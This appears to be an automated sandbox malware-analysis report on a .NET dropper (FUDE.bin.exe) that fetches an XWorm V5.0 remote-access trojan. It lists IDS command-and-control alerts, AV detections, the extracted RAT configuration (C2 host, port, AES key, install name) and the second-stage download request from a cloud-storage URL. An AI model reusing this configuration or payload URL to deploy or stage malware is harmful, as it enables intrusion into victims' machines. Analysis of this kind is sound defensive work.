            Timestamp:2024-08-04T12:55:03.985940+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:08.757480+0200
            SID:2853193
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:46.548058+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:04.048022+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:19.218928+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:04.163817+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:10.052207+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:27.590423+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:06.724849+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:37.992711+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:47.057193+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:11.560748+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:56:37.804639+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:15.735027+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:21.915290+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:55:58.358434+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:57.314856+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:53:50.338154+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:21.198042+0200
            SID:2852923
            Source Port:49733
            Destination Port:39129
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-04T12:54:15.718707+0200
            SID:2852870
            Source Port:39129
            Destination Port:49733
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: FUDE.bin.exeAvira: detected
            Source: ads-jeremy.gl.at.ply.ggAvira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\file.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
            Source: 00000002.00000002.4142868111.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "ads-jeremy.gl.at.ply.gg"], "Port": "39129", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.0"}
            Source: C:\Users\user\AppData\Local\Temp\file.exeVirustotal: Detection: 66%Perma Link
            Source: FUDE.bin.exeVirustotal: Detection: 17%Perma Link
            Source: FUDE.bin.exeReversingLabs: Detection: 15%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\file.exeJoe Sandbox ML: detected
            Source: FUDE.bin.exeJoe Sandbox ML: detected
            Source: 2.0.file.exe.c40000.0.unpackString decryptor: 127.0.0.1,ads-jeremy.gl.at.ply.gg
            Source: 2.0.file.exe.c40000.0.unpackString decryptor: 39129
            Source: 2.0.file.exe.c40000.0.unpackString decryptor: <123456789>
            Source: 2.0.file.exe.c40000.0.unpackString decryptor: <Xwormmm>
            Source: 2.0.file.exe.c40000.0.unpackString decryptor: XWorm V5.0
            Source: 2.0.file.exe.c40000.0.unpackString decryptor: USB.exe
            Source: FUDE.bin.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\ADMIN\source\repos\FUDE\FUDE\obj\Release\FUDE.pdbS:m: _:_CorExeMainmscoree.dll source: FUDE.bin.exe
            Source: Binary string: C:\Users\ADMIN\source\repos\FUDE\FUDE\obj\Release\FUDE.pdb source: FUDE.bin.exe

            Networking

            barindex
            Source: Malware configuration extractorURLs: 127.0.0.1
            Source: Malware configuration extractorURLs: ads-jeremy.gl.at.ply.gg
            Source: global trafficTCP traffic: 192.168.2.4:49733 -> 147.185.221.17:39129
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 04 Aug 2024 10:52:59 GMTContent-Type: application/x-dosexecContent-Length: 33280Connection: keep-aliveKeep-Alive: timeout=60Last-Modified: Sun, 04 Aug 2024 10:11:37 GMTAccept-Ranges: bytesX-Data-Size: 33280X-Mds-Request-Id: 32720597c0e42783X-MDS-TVM-ERROR: missingX-Content-Type-Options: nosniffAccess-Control-Allow-Origin: *Content-Disposition: attachment; X-Content-Type-Options: nosniffData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c8 53 af 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 3e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 96 00 00 4f 00 00 00 00 a0 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 77 00 00 00 20 00 00 00 78 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 97 00 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4f 00 00 60 47 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELSfx> @
            Source: global trafficHTTP traffic detected: GET /rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be821e96b/66af8c32/AiwRdOOLiCrkwWShBhcRfBv66wdV_gWAlrktMbpOi7EPEHHuUDDgYy0_mv6esa-xg8RAhDBKCZL5h5sBq8Fb4w==?uid=0&filename=xcweb.exe&disposition=attachment&hash=HqgB2usPumPowCfFVqsCvy%2BR6Xnj%2BKgdMRlicFj1Jpw3VwaT47lG5dSCsMa3WnKmq/J6bpmRyOJonT3VoXnDag%3D%3D&limit=0&content_type=application%2Fx-dosexec&owner_uid=1425898286&fsize=33280&hid=2a700e71c2af2dc9615f16632c865451&media_type=executable&tknv=v2&ts=61edc24f5f080&s=f9c98e348785dccf7ddd4c1ac9efee6f2007fa91d8871ab0e4447b34248bfafb&pb=U2FsdGVkX1-5hsS7H2xAWpYocjMKREeX7oisuiFsZmtN3VlwKpxAkVWcvjdgtCOv1pWfi3zxnvfJtU6seQHLVUNQupWbg-u7Fz1wzLTPUO8 HTTP/1.1Host: s355vlx.storage.yandex.netConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 147.185.221.17 147.185.221.17
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be821e96b/66af8c32/AiwRdOOLiCrkwWShBhcRfBv66wdV_gWAlrktMbpOi7EPEHHuUDDgYy0_mv6esa-xg8RAhDBKCZL5h5sBq8Fb4w==?uid=0&filename=xcweb.exe&disposition=attachment&hash=HqgB2usPumPowCfFVqsCvy%2BR6Xnj%2BKgdMRlicFj1Jpw3VwaT47lG5dSCsMa3WnKmq/J6bpmRyOJonT3VoXnDag%3D%3D&limit=0&content_type=application%2Fx-dosexec&owner_uid=1425898286&fsize=33280&hid=2a700e71c2af2dc9615f16632c865451&media_type=executable&tknv=v2&ts=61edc24f5f080&s=f9c98e348785dccf7ddd4c1ac9efee6f2007fa91d8871ab0e4447b34248bfafb&pb=U2FsdGVkX1-5hsS7H2xAWpYocjMKREeX7oisuiFsZmtN3VlwKpxAkVWcvjdgtCOv1pWfi3zxnvfJtU6seQHLVUNQupWbg-u7Fz1wzLTPUO8 HTTP/1.1Host: s355vlx.storage.yandex.netConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: s355vlx.storage.yandex.net
            Source: global trafficDNS traffic detected: DNS query: ads-jeremy.gl.at.ply.gg
            Source: explorer.exe, 00000003.00000000.1694064441.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4145556049.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1695776018.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: explorer.exe, 00000003.00000000.1694064441.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4145556049.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1695776018.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: explorer.exe, 00000003.00000000.1694064441.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4145556049.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1695776018.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: explorer.exe, 00000003.00000000.1694064441.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4145556049.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1695776018.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: explorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: FUDE.bin.exe, 00000000.00000002.1707448372.000000000339E000.00000004.00000800.00020000.00000000.sdmp, FUDE.bin.exe, 00000000.00000002.1707448372.0000000003394000.00000004.00000800.00020000.00000000.sdmp, FUDE.bin.exe, 00000000.00000002.1707448372.00000000033A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s355vlx.storage.yandex.net
            Source: FUDE.bin.exeString found in binary or memory: http://s355vlx.storage.yandex.net/rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be821
            Source: FUDE.bin.exe, 00000000.00000002.1707448372.00000000033A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s355vlx.storage.yandex.netd
            Source: explorer.exe, 00000003.00000000.1694888543.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1695304954.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4148927014.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: FUDE.bin.exe, 00000000.00000002.1707448372.0000000003394000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4142868111.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000003.00000000.1698574900.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4152476174.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: explorer.exe, 00000003.00000000.1694064441.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4145556049.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000003.00000000.1694064441.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4145556049.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000003.00000000.1695776018.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000003.00000000.1695776018.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000003.00000002.4142776255.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1691212547.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141791366.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1692806772.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000003.00000000.1695776018.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000003.00000000.1695776018.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000003.00000000.1695776018.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: explorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: explorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000002.4151464173.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
